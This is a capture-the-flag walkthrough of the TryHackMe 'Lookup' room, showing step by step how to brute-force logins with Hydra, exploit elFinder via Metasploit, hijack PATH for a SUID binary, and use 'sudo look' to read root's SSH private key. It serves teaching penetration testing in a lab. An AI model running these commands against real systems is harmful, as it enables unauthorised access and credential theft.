Lookup TryHackMe Motion Graphics Writeup || Detailed Walkthrough || Beginner Friendly || SuNnY
A Motion Graphics Writeup for New Room → Lookup on TryHackMe
data:image/s3,"s3://crabby-images/935b2/935b2fa5bb400408c29629a3fde9000472e685a4" alt=""
Kudos to The Creator(s) of this Room →
data:image/s3,"s3://crabby-images/c49bb/c49bb9ec2fa8d71c4784787ef33ff376a92e8844" alt=""
ROOM DIFFICULTY
Easy → Difficulty
[ Name : Lookup ]
This is a Free Room. Anyone can deploy virtual machines in the room
(without being subscribed)!
ROOM OBJECTIVES →
- User Flag
- Root Flag
Let’s begin with adding the ip address to the Hosts file
and give it a domain name → lookup.thm
echo "IP-ADDRESS-OF-YOUR-MACHINE lookup.thm" | sudo tee -a /etc/hosts
Other Way :
** You can use any text editor for this , VIM , subl , etc →
nano /etc/hosts
IP-ADDRESS-OF-YOUR-MACHINE lookup.thm
( Control + X and Y for saving the file ) Dont forget to add your machine’s ip address instead of —
“IP-ADDRESS-OF-YOUR-MACHINE”
INITIAL ENUMERATION
→ Nmap Scan
nmap -sVC -A lookup.thm -oN nmap.txt
data:image/s3,"s3://crabby-images/72d7e/72d7ea213fa8ccaef73f1c0c289bd88cfe0a5e27" alt=""
Open Ports and Services from the nmap scan :
22/tcp: SSH service is open, running OpenSSH version 8.2p1 on Ubuntu Linux. The SSH protocol used is version 2.0. Host keys are shown for RSA, ECDSA, and ED25519.
80/tcp: HTTP service is open, running Apache HTTP server version 2.4.41 on Ubuntu. The HTTP server header and title reveal it’s a Login Page.
Operating System Detected from nmap scan :
The system runs a Linux-based OS. Nmap could not identify the exact OS version but hints that it is based on the Linux kernel.
A Login Page is Detected on Port 80 →
data:image/s3,"s3://crabby-images/145e1/145e14c5337a4ee4c077fa43767492901aa1c335" alt=""
Web Server Version Detected On Wappalyzer Plugin in Firefox
data:image/s3,"s3://crabby-images/d80e1/d80e1fb542b324feac37036eadd240fcf42a4e65" alt=""
Web Server Found -> Apache HTTP Server 2.4.41
We have to find Credentials to the Login page @Port 80
We can do this by couple of ways , by using burp suite or use Hydra to do a Brute-force attack
We will choose the Hydra way since this is a beginner friendly room
Let’s First try using the default credentials like → admin:admin
OR admin:password
data:image/s3,"s3://crabby-images/1e772/1e772c350cd02962901d0461bd4f4db78cab8049" alt=""
Default Credentials don’t work ! But an error query is returned →
Wrong password. Please try again.
Redirecting in 3 seconds.
The Form action uses login.php
→
data:image/s3,"s3://crabby-images/20396/2039625074f1368ef9467fb862c8e73bd037967b" alt=""
Let’s use the above information for doing a Brute-Force Attack
with the Tool → Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong password. Please try again."
hydra -l admin -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form “/login.php:username=^USER^&password=^PASS^:Wrong password. Please try again.”
hydra
:
- The main tool for conducting brute-force attacks against login services.
-l admin
:
- Specifies the username to test.
In this case, the username is fixed asadmin
.
-P /usr/share/wordlists/rockyou.txt
:
- Specifies the password list to use.
Here, the wordlist is the popularrockyou.txt
,
commonly used in brute-force attempts.
ipaddress.com
:
- The target server’s domain or IP address.
Replace this with the actual address of the target.
http-post-form
:
- Specifies the service/module to attack.
In this case, it’s a web form using the HTTP POST method.
"/login.php:username=^USER^&password=^PASS^:Wrong Password. Please try again."
:
/login.php
: The login form's URL endpoint.username=^USER^&password=^PASS^
:
The POST parameters sent to the server.^USER^
: Placeholder for the username being tested
(replaced by-l admin
).^PASS^
: Placeholder for the password being tested
(taken fromrockyou.txt
).
Wrong Password. Please try again.
: The failure message from the server. Hydra uses this text to identify incorrect login attempts.
Hydra sends HTTP POST requests to
/login.php
, replacing^USER^
withadmin
and^PASS^
with each password from therockyou.txt
wordlist.If the response does not contain
Wrong Password. Please try again.
, Hydra assumes the credentials are valid.
Valid Credentials that were found →
admin : password123
data:image/s3,"s3://crabby-images/edd39/edd392cd658e4d8c6bda13e2378307e7719bef40" alt=""
Let’s Try to login using the just Found Credentials →
After trying to login to the above found credentials , we still were not able to login to the page , which could mean that we need to find other username for the login page
Now we will use the Password → password123
to find other username for the login page
hydra -L /usr/share/seclists/Usernames/Names/names.txt -p password123 lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=try again"
Found Credentials with Hydra →
jose:password123
data:image/s3,"s3://crabby-images/5ec8b/5ec8b30df1fafd2c58cd77530217cdb19ec092c9" alt=""
jose:password123
data:image/s3,"s3://crabby-images/658a6/658a6ed019040aa062c31b036295c40ac672131a" alt=""
Let’s now Trying login in with these credentials → jose:password123
data:image/s3,"s3://crabby-images/a2818/a281803baf73734c584cfe26e4923b567dc7f943" alt=""
After trying to login with the credentials → jose:password123
,
We are redirected to a new URL → files.lookup.thm
data:image/s3,"s3://crabby-images/5d083/5d083018e1a461f9f868611ada0ea274a95bcf3c" alt=""
Let’s add an entry of → files.lookup.thm
to → /etc/hosts
nano /etc/hosts
data:image/s3,"s3://crabby-images/02842/02842f1280039e4d47e393ff5e86e6cd3d2bb763" alt=""
You can ping
files.lookup.thm
to check connectivity
data:image/s3,"s3://crabby-images/32b31/32b318264618cb22aaba470301f22ed7bb652c7d" alt=""
After refreshing the page we find a page with 20 Items
There are 18 Files with padlock icon which could indicate access restriction
There are 2 Files without the padlock icon which could mean file could be read
data:image/s3,"s3://crabby-images/8d705/8d705476a624991a1ec04bc769c5194f4fd9850c" alt=""
Let’s First check the 2 Files without padlock
data:image/s3,"s3://crabby-images/71cac/71cacbb83c3812b7ba442f84a4bf68bc63016d07" alt=""
Under the file credentials we found → think:nopassword
Can this be the Credentials for SSH login ?
data:image/s3,"s3://crabby-images/9215c/9215ca7ef40d40a9db710309158bbc2a2aa13edc" alt=""
data:image/s3,"s3://crabby-images/3ffb5/3ffb5f076e6a975d9d999e0c24dd8fa474ad94ba" alt=""
Just Fell down the Rabbit Hole !!
But Hey! Atleast we know the user is potentially → think
Hackers Joke incoming →
Let’s Quickly
:wq!
outta this one 🤐
Let’s try to find other Clues within the files page→
data:image/s3,"s3://crabby-images/3f08f/3f08fb612b40b967cd91a0b92e702b6180487e81" alt=""
We that the Web File Manager is Running on →
elFinder Version 2.1.47
data:image/s3,"s3://crabby-images/f716a/f716a46dd025483abc507d16dd893412542f7238" alt=""
Let’s Find the Vulnerability of elFinder
using Searchsploit
on CLI
data:image/s3,"s3://crabby-images/c7f36/c7f369e1ab71340d9132a134055eb898a5953a60" alt=""
Let’s Use the Metasploit exiftran Command Injection Exploit
Starting Metasploit Framework →
To properly initiate the Metasploit Framework let’s use this command →
msfdb init && msfconsole
data:image/s3,"s3://crabby-images/53284/532845e57d589840538a547b363723a74b949a2b" alt=""
Now Let’s Search for
elFinder 2.1.48
within the Metasploit Framework
data:image/s3,"s3://crabby-images/1e902/1e90263514319140c3fd35399fe4ac43357edfb5" alt=""
After Selecting the correct module →
use 0
…. Let’s set the options parameter
data:image/s3,"s3://crabby-images/531f1/531f16dcf9aa3c166432e0004647d24fc849260e" alt=""
After Setting the options Parameter on Metasploit Framework ,
Let’s run the attack
data:image/s3,"s3://crabby-images/c341d/c341d98a95e585446ad69ae4931d488d5a9574ee" alt=""
Let’s Get the shell of the Meterpreter
data:image/s3,"s3://crabby-images/1524a/1524a543280cbf869b7ac739d65ead6f8b362ed1" alt=""
We got the
www-data
Shell from the Metasploit exploit
Privilege Escalation To User Account →
Remember we found
think
credentials ? ,
Now we need to get the password to userthink
Let’s Now check for SUID Binaries →
find / -perm /4000 2>/dev/null
data:image/s3,"s3://crabby-images/2298f/2298f3d4ad05490b75e5d507b6bdc93cc5ff2b45" alt=""
/usr/sbin/pwn
/usr/sbin/pwn
Looks interesting
Let’s check the file permission for
/usr/sbin/pwn
data:image/s3,"s3://crabby-images/21082/210827d39e65ea1d503a39ad9a2665c179330cab" alt=""
Let’s try running
/usr/sbin/pwm
→
data:image/s3,"s3://crabby-images/a9e76/a9e7677aeccf45b2508af3447cec73defc72996a" alt=""
On execution this binary returns the id value and then tried to grab the File → /home/www-data/.passwords
We have to get to the .passwords
file
on the Binary the Path is set to user www-data , if we are able to manipulate the path by changing it to tmp directory → inside /tmp directory we have set the current path to /tmp because /tmp is World-readable and then creating a bash file which impersonates as think
user
data:image/s3,"s3://crabby-images/f6b79/f6b7920f60e79b9775329518f08cd9c1246ecbc9" alt=""
Let’s Change the Directory to /tmp
, and create a bash file which impersonates the user think
→
Let’s create a file named id
echo -e '#!/bin/bash\n echo "uid=33(think) gid=33(think) groups=33(think)"' > id
For those who are confused using the echo command →
you need to wrap the command inside single quote instead of double quotes
data:image/s3,"s3://crabby-images/a8ee2/a8ee299159c78e732254042842eb1d5c6226360e" alt=""
Don’t forget to CHMOD +x to id file
data:image/s3,"s3://crabby-images/ef8b7/ef8b7ba1128d2ac53939117f0e75c6b10d8d2694" alt=""
Now Let’s try running → /usr/sbin/pwm
now , the SUID will now set the user to think
and returns the passwords file
data:image/s3,"s3://crabby-images/ebf9e/ebf9e849d5a5d32f261dd83e329a629b759e0ab9" alt=""
We found a bunch of passwords , which we are going to save to a File locally
Now Let’s perform an SSH Brute-Force using the passwords file using hydra tool
hydra -l think -P /pathtoyourpasswordfile ssh://lookup.thm
The Above command will run a Brute-Force attack on Port 22 with the passwords file for user → think
data:image/s3,"s3://crabby-images/e6fe4/e6fe48959e4e17bc16b2c52e3be082ef175f99e5" alt=""
We found the password , Let’s login to the User think
with the newly discovered password using SSH
data:image/s3,"s3://crabby-images/5e098/5e098fd1ba3159f646648a0452adb96699b42559" alt=""
We Have found the → User Flag
Priv Esc To Root
While logged in to user →
think
Let’s check it’s sudo privileges
data:image/s3,"s3://crabby-images/b25df/b25dfcc90e711156299fe131aed76751f83419df" alt=""
Let’s Find the look exploit on → GTFOBins
data:image/s3,"s3://crabby-images/7e4c9/7e4c99c68e129384352c79010ac4bfce83d7ff16" alt=""
data:image/s3,"s3://crabby-images/4a69d/4a69d9110610a2b0dd27f4e8edfac80916eab582" alt=""
LFILE=/root/.ssh/id_rsa
sudo look '' "$LFILE"
We can now use the above command to get the
id_rsa
Key to get to root login directly →
Usually the location for id_rsa
is stored under the .ssh
folder →
sudo /usr/bin/look '' /root/.ssh/id_rsa
This will return the
id_rsa
key for the root superuser →
data:image/s3,"s3://crabby-images/7a6f1/7a6f1321e2722818668001da1afea74e3faf9b98" alt=""
Now after getting the id_rsa
key , we need to save it to a file locally and give id_rsa permissions by → chmod 600 id_rsa
We have the id_rsa for root account
Let’s Login to root via SSH
ssh -i id_rsa root@lookup.thm
data:image/s3,"s3://crabby-images/07f45/07f4561f53b088b044657d73d9274b1b3a2cea4f" alt=""
Room Objectives are now achieved ! Congratulations
data:image/s3,"s3://crabby-images/ee679/ee679a4be932bfa473b3e7307a864148611866aa" alt=""
Congratulations !! You have successfully solved this Room